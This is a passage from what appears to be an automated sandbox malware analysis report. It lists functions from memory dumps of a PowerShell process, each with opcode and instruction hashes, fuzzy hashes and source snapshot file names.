                                          • Opcode Fuzzy Hash: f35c078ceb55ec3e454f5845cbc56071b0ac2c2ca3fd225a20ad20b78f587ba6
                                          • Instruction Fuzzy Hash: B8119E75A00606AFCB01CFA8D8819A9FFF2FF48310B008566E508EBB61C771AC59CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06264090 Relevance: .0, Instructions: 50COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ae79d7322bb8411f1d6bce37f695ad8941dc0e3afcf344d89be96832a96fbf99
                                          • Instruction ID: f0be11d55d2e777afa32c23176cc085b8bbb161fbe08ff97fc1f38f074de05fa
                                          • Opcode Fuzzy Hash: ae79d7322bb8411f1d6bce37f695ad8941dc0e3afcf344d89be96832a96fbf99
                                          • Instruction Fuzzy Hash: CE014570A453546BD711DBA99C06BBF7FB69B82700F1440B6F944AB2C2CBB04805C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06267828 Relevance: .0, Instructions: 50COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12c498a103d6edcce43fb559583650bd271ce506159665c798b04bfb03e75a92
                                          • Instruction ID: c7b7637a0964ad178c5c64b2f24bc6117e66a4104b6787d93e1063587abfe9e5
                                          • Opcode Fuzzy Hash: 12c498a103d6edcce43fb559583650bd271ce506159665c798b04bfb03e75a92
                                          • Instruction Fuzzy Hash: 9D11A53150070A8BC761DF69E890ADA77A1EF80718F048D25EC058BA75D774AD5FCBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062603F0 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61b45abb20a763db81868b0abd23886b1168cfb87be09ac3cfac50e2c8368472
                                          • Instruction ID: 14d65eb680f068c33a1e83cbdfdfab63f0294508f7ca3ba08557abab8711f1e6
                                          • Opcode Fuzzy Hash: 61b45abb20a763db81868b0abd23886b1168cfb87be09ac3cfac50e2c8368472
                                          • Instruction Fuzzy Hash: 09018035B012055BDB11DA69D8909AFB7A6EF85314F044479ED08AB344DB74AD028BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626110F Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6aa2352d5d81f4d55bac63243988e64cee6cfefd00e4bc538485551835fbb0a5
                                          • Instruction ID: 1c6d48d0a33557138c374086579a6253955da6e591abce451abc4787abc10c6a
                                          • Opcode Fuzzy Hash: 6aa2352d5d81f4d55bac63243988e64cee6cfefd00e4bc538485551835fbb0a5
                                          • Instruction Fuzzy Hash: 0E01F53870010C6FD704AAA4E8A5BAF7767DFC4358F004064D90577794DF396C168B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06268190 Relevance: .0, Instructions: 47COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e60a78ed39166b5789870339ae543602e5bd8291b91a28b2cf3a8e470520c819
                                          • Instruction ID: 64fb2473a217cd0f8ec0cb9fa3dac71e83fc354b752bfadd069d4458d151a095
                                          • Opcode Fuzzy Hash: e60a78ed39166b5789870339ae543602e5bd8291b91a28b2cf3a8e470520c819
                                          • Instruction Fuzzy Hash: 2A115A70D10249AFCF04CFA6D854AEEBFF6AF48310F148026F810B7250DB749A54CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062688F0 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9508f10beb77ef5f098390eaeb89390fc35bd85de00ea20645b1843b594d50e
                                          • Instruction ID: 32671f9b700c5d86994a055b1ca48c8b4e67c6a24e7031719e29b8b908b2b1e2
                                          • Opcode Fuzzy Hash: b9508f10beb77ef5f098390eaeb89390fc35bd85de00ea20645b1843b594d50e
                                          • Instruction Fuzzy Hash: 95015B3560050AAFCB00DFA8D8848AEBBF6FF88710B008625E90997760D771AD69CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062640A0 Relevance: .0, Instructions: 45COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 46ae9ad8200caf0768ca492649c7aedef8493efda479ae26ce309ecd1411e340
                                          • Instruction ID: 644e0e0d6dc6734c335d746283518cce3974efc6255b4cf4463bc5516a4fc431
                                          • Opcode Fuzzy Hash: 46ae9ad8200caf0768ca492649c7aedef8493efda479ae26ce309ecd1411e340
                                          • Instruction Fuzzy Hash: 5C01F770F412546BE7109BA99C05BBF7BB69B85710F544076F9446B2C1CBB05915C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06264C00 Relevance: .0, Instructions: 45COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 127232af359a9f32c0f0ce9ee68a6cf2bb2b60bff94b8868dfd006f59ae04093
                                          • Instruction ID: 59e0383e47e090d1f8831e52a9c68dd49dd8bf8066cfd6fc86c78a7f9a8dd70b
                                          • Opcode Fuzzy Hash: 127232af359a9f32c0f0ce9ee68a6cf2bb2b60bff94b8868dfd006f59ae04093
                                          • Instruction Fuzzy Hash: D501F770F412156BE7109BA9DC05BBF7BB6AF85700F644076F9456B2C1CB745905C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062660BD Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: baa6761430492277bc7ceadcdebcffa00c6802be071353567974a72a15d4548e
                                          • Instruction ID: 81f0165a7ed180c5a42f3c1cd84aa3abb66a57a3284ce33753a7930335710f25
                                          • Opcode Fuzzy Hash: baa6761430492277bc7ceadcdebcffa00c6802be071353567974a72a15d4548e
                                          • Instruction Fuzzy Hash: 0DF02236718241AFDB305A27CD01BA77BEDAB866A0F048076FD09CA381C631C842C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06268A11 Relevance: .0, Instructions: 42COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4a7d8b20e32bc630d002d45eca894c4662e857190a1911687a34d725f1a0a4e
                                          • Instruction ID: 014976c91e0e3266432fde769427cd5c278f94d9c3663363e5ca4680c910e274
                                          • Opcode Fuzzy Hash: a4a7d8b20e32bc630d002d45eca894c4662e857190a1911687a34d725f1a0a4e
                                          • Instruction Fuzzy Hash: 6F0144367042919FE7128B369C10B3ABF66DF86620B0884AAFC40CB282CA35CC45C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06265310 Relevance: .0, Instructions: 40COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c7805390d6545b49a61c001e077ef127e54ea8686a5ea4994fd43867565aa5a
                                          • Instruction ID: 06fc83e4d9066de2031fae3426684250778fd2b9ee24604a7d1c466c00a6f885
                                          • Opcode Fuzzy Hash: 6c7805390d6545b49a61c001e077ef127e54ea8686a5ea4994fd43867565aa5a
                                          • Instruction Fuzzy Hash: 5E018F31710B04CFCB249A69E084BA677F6EF85321F44096DE49A87660C770F89ACB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06269840 Relevance: .0, Instructions: 40COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e9a378ee6e655c1b1396295b93ec64e3acffb52d0303c4885858e63d03c4518a
                                          • Instruction ID: 8276ff220db8ac9e985b5bcdf9e71e3220a4a2e6408fb344dec651440637278a
                                          • Opcode Fuzzy Hash: e9a378ee6e655c1b1396295b93ec64e3acffb52d0303c4885858e63d03c4518a
                                          • Instruction Fuzzy Hash: 18F0F635A113536BD7518A278900AE3BBB9EF852A1B288097FC048F261DA35C5C5DBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062762F9 Relevance: .0, Instructions: 37COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 85f2e5eb6571963465598e812d02a9a3e0d706d56048f589f498ff1f0bd0441b
                                          • Instruction ID: 249238fd2e71fabc3a89a27b3836c2fef5ce695c316b95c59257ff0ee010b82b
                                          • Opcode Fuzzy Hash: 85f2e5eb6571963465598e812d02a9a3e0d706d56048f589f498ff1f0bd0441b
                                          • Instruction Fuzzy Hash: E101F632100249BBCF529FA5DC00DDE3F76FF89754B084509FE5442521C732E965EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062695F8 Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63dbc0ea05b4d261712f9e71680b634cecd7e31dbb630b94fd059f9adbb75a2d
                                          • Instruction ID: cd8533bbf6df7eb64d2eec4f2d2e82f1cd7a7fdab30d89a4854f212af00efcad
                                          • Opcode Fuzzy Hash: 63dbc0ea05b4d261712f9e71680b634cecd7e31dbb630b94fd059f9adbb75a2d
                                          • Instruction Fuzzy Hash: E1F059363103525FC3058B6AA9159BABFEEDFC9611309819BF805C3242CA34F94297E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06276F28 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 03bf9006bcb2843403193473906607efd2176a7a1834b684d686460996e9ac84
                                          • Instruction ID: e55e68c8c3b50d4cefa5266a27702206f09aae3da3aa5495a3154b0de5bd2fc2
                                          • Opcode Fuzzy Hash: 03bf9006bcb2843403193473906607efd2176a7a1834b684d686460996e9ac84
                                          • Instruction Fuzzy Hash: 49E022B3D043146BDB069A68DCA27CB3FBAEB14221F0484B6E841D3A80FE30998582D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06264120 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e67e908f59bab824c22900726ba2d10eb33bd5fe1f24ab8cc102f5a586fbdf30
                                          • Instruction ID: 9ebc62ecaa4e8edff05908a6de00dcc13d324ddf31e210b88eeaeb1b0befe9d7
                                          • Opcode Fuzzy Hash: e67e908f59bab824c22900726ba2d10eb33bd5fe1f24ab8cc102f5a586fbdf30
                                          • Instruction Fuzzy Hash: 68F08BF2A441A45FE7019BA4CC117F9BBF0DBA1210F4440E7F441CB5D2C7B541A5C750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062604F8 Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a412720d8bce124f1a8873285dc0c59d9ecedca78ff5114347aca6b127af58f3
                                          • Instruction ID: f513d5f49d3fcccb76e25978d0cc03a1e023bf5febd96327717d245411f89258
                                          • Opcode Fuzzy Hash: a412720d8bce124f1a8873285dc0c59d9ecedca78ff5114347aca6b127af58f3
                                          • Instruction Fuzzy Hash: EBF02709B043881FEB49A3B458A023B29E39BC5554B08C8B6D407DF385DD344C0623E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626BA78 Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 783a5aadbcd94573d9a3e3d19fcc089359c32cc4326b920453c5ef68f61ef699
                                          • Instruction ID: 50eefb582fcaacfd36e62756e387bd75251bf6c930a64c347b539ebd8d5b597c
                                          • Opcode Fuzzy Hash: 783a5aadbcd94573d9a3e3d19fcc089359c32cc4326b920453c5ef68f61ef699
                                          • Instruction Fuzzy Hash: E8F0C2368202559BDB508EA9C9093EABBB1EB48301F04046AE801F3380CB740C54CBD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06276308 Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ac833512fbb96c5cbcc2d66397851aaa113ddfe34da7decc67ba2d88618e494
                                          • Instruction ID: 4f5ee1f991488aeb89d746d9ad5c660489272a2c59cb81c180ed25bd956b14a7
                                          • Opcode Fuzzy Hash: 6ac833512fbb96c5cbcc2d66397851aaa113ddfe34da7decc67ba2d88618e494
                                          • Instruction Fuzzy Hash: 66F0CF3210014DBB8F529E95DD00CDE3F76FF88754B055919FE1846620C732E866EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06269298 Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f86e7a73ece568f6c7c79aa33d939f4cf4e47f0ede5b232ffd554cd07012101c
                                          • Instruction ID: 78af2c863d9e5172a5ec888ee9196a4ab68626ced078bfdd3cd650af7e81dd3a
                                          • Opcode Fuzzy Hash: f86e7a73ece568f6c7c79aa33d939f4cf4e47f0ede5b232ffd554cd07012101c
                                          • Instruction Fuzzy Hash: F4F09E7220455167D3019B94DCBD76B7B1FFFC0325F040035E20987581CF2158928BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626DFA8 Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 504ddd1d78b057735b08e36f740026701748e499fb7430eafcb12cf512808be3
                                          • Instruction ID: b9b9efeee42d49e4238fe5d3e6a17c477177b1dfbeaea8823d14486658d387ee
                                          • Opcode Fuzzy Hash: 504ddd1d78b057735b08e36f740026701748e499fb7430eafcb12cf512808be3
                                          • Instruction Fuzzy Hash: D8F09032210215AFC7509F6AD808E5ABBA9EF88B60B018055FD04DB260D771DC41DBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06276361 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2891100f979d28639abd54d1fde8ee4670518326292194e28fa45dc01c6cf2ad
                                          • Instruction ID: b79f59ebc6f1ea5983b75b68cce0b68b6e0533891ae3a246ecb12a050f507012
                                          • Opcode Fuzzy Hash: 2891100f979d28639abd54d1fde8ee4670518326292194e28fa45dc01c6cf2ad
                                          • Instruction Fuzzy Hash: 5BF0E232000649ABCF429FA4E800DDA3FA6BF48354B048A06FE4446521D636E965AB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06260508 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b24b886dee3a5dab15cb58a1aff9001e6e03a63b38cf04537e7908ea93192744
                                          • Instruction ID: 9ba1d80ac922ca3d7a2d9cb4f09383f247772882cdc23de7410108ddf0a81dc7
                                          • Opcode Fuzzy Hash: b24b886dee3a5dab15cb58a1aff9001e6e03a63b38cf04537e7908ea93192744
                                          • Instruction Fuzzy Hash: E2E09219B102582FDB58B2B9989067F35DBABC5994B44C87AD507EB784DE308D0523E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06274CA8 Relevance: .0, Instructions: 30COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e4c5b6e2ed84b820e104d5450cba25bb81a0e42c5d5e84ba0835fb536029a5f
                                          • Instruction ID: 9af75ccd8cf6b80799de465a302d03eea4fcf56fe6972a34b1d49dc966af2e09
                                          • Opcode Fuzzy Hash: 6e4c5b6e2ed84b820e104d5450cba25bb81a0e42c5d5e84ba0835fb536029a5f
                                          • Instruction Fuzzy Hash: 33E0E536B102149BCB189668D8144EE77EAEBC8222B04007AD902E3740CFB5DC05CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0627F431 Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48ef72e42a5f5a9dcba2ccda53aee3db7dd16fccf58e0b8f2de0fd81ce0330b9
                                          • Instruction ID: 3a4da77ca510d7e842803cd3fc602ebeb6e8dad6b8fa55c8ecae6d318ab7b76f
                                          • Opcode Fuzzy Hash: 48ef72e42a5f5a9dcba2ccda53aee3db7dd16fccf58e0b8f2de0fd81ce0330b9
                                          • Instruction Fuzzy Hash: F5F08C303184400FE381EBACE864BAA6792DFC6208F1980A9DA458B386DE31DC038B80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06265388 Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 101e61d0fae58972dc3cfa00aeeac53cb60a65fab4dcc65c1f243a99c281b3dd
                                          • Instruction ID: 8b76d74acc4f5fe917f69bed190705d90a358bd69a45168b008714067caab4cf
                                          • Opcode Fuzzy Hash: 101e61d0fae58972dc3cfa00aeeac53cb60a65fab4dcc65c1f243a99c281b3dd
                                          • Instruction Fuzzy Hash: 68E09276501105AFD6009A45EC84EA7FFACFB89364B054291F90897342C631FC81C7F4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06269608 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 85a841f22c9b7defbf36fe2ab5f5b277dba6f941accc120196714a39b4d3b20a
                                          • Instruction ID: 438079e29cf056ecb248f9d7303a3d9727746413b61580aafb6f1f60d3640ad7
                                          • Opcode Fuzzy Hash: 85a841f22c9b7defbf36fe2ab5f5b277dba6f941accc120196714a39b4d3b20a
                                          • Instruction Fuzzy Hash: F1E092313102115B47149E2AA55597BBFEE9BC9A5130481AAF90AC3340DF34EA42ABE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062692A8 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbd0224cad5870ab8983ed3f4909e38759ae6e25ba1b76427828a3729b86afdc
                                          • Instruction ID: 17f7adcd24a5b3a4db676f25643eb6154081b793fd8e2219c762032954036f12
                                          • Opcode Fuzzy Hash: fbd0224cad5870ab8983ed3f4909e38759ae6e25ba1b76427828a3729b86afdc
                                          • Instruction Fuzzy Hash: ABE02B7130052567D301AB8AE8FCB2B776EFBC4325F410034E60987580CF216C828BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06263C3E Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3f239066df405de115ad3f319cd712c0e48e94de634cbf8925fd0355d0d8b3c
                                          • Instruction ID: 2b2a1ab4a4e0c7d3e0f03437492d07b9edbfdf6daadb3165edb692a1d4f5d156
                                          • Opcode Fuzzy Hash: b3f239066df405de115ad3f319cd712c0e48e94de634cbf8925fd0355d0d8b3c
                                          • Instruction Fuzzy Hash: BFE0263B3011143BE718963BEC11B5B7B5ADBD46F1F288031BC08C2300ED30DC1182A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06260A90 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e69f6aacc4af98eccb743266743592d2ecae6181fa920a7e1acf6c07915466fc
                                          • Instruction ID: fdfc8ddf589444558d897c6fb9ed516bb8e91d636a75c6556bde6625f5e3a7af
                                          • Opcode Fuzzy Hash: e69f6aacc4af98eccb743266743592d2ecae6181fa920a7e1acf6c07915466fc
                                          • Instruction Fuzzy Hash: C4E092312002046BC304F6AAE8949AAB79BEFC532478489B9E109D7610DF61AC0B87E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06276370 Relevance: .0, Instructions: 27COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 079c00ec745d37f00cda63304ca6966369ae9a0270b4a32cd8fe0ec49d637c82
                                          • Instruction ID: 25814f1b48b8d56225444642a18ed16fc10d712e6a6786792614d479a23e28fd
                                          • Opcode Fuzzy Hash: 079c00ec745d37f00cda63304ca6966369ae9a0270b4a32cd8fe0ec49d637c82
                                          • Instruction Fuzzy Hash: 8DF0BC3200020DBB8F429F94D900CDA3FA6FF48364B409905FE4456620C672E9A5AB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626867D Relevance: .0, Instructions: 26COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
